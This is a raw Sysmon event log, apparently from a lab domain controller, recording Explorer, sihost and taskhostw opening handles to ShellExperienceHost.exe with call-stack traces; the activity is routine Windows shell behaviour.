13:30:09.826{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+590b|C:\Windows\System32\twinui.appcore.dll+470d|C:\Windows\System32\twinui.appcore.dll+3e1e|C:\Windows\system32\activationmanager.dll+79e9|C:\Windows\system32\activationmanager.dll+ac47|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+625f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5dfa|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ea2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ff5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ac73|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c499|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4cc3|C:\Windows\System32\TwinUI.dll+f4d62|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+141c7c|C:\Windows\System32\TwinUI.dll+e7804|C:\Windows\System32\TwinUI.dll+e28fb|C:\Windows\System32\TwinUI.dll+1487f6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.810{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+625f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5dfa|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ea2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ff5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ac73|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c499|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+141c7c|C:\Windows\System32\TwinUI.dll+e7804|C:\Windows\System32\TwinUI.dll+e28fb|C:\Windows\System32\TwinUI.dll+1487f6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.795{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.779{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.779{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.779{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 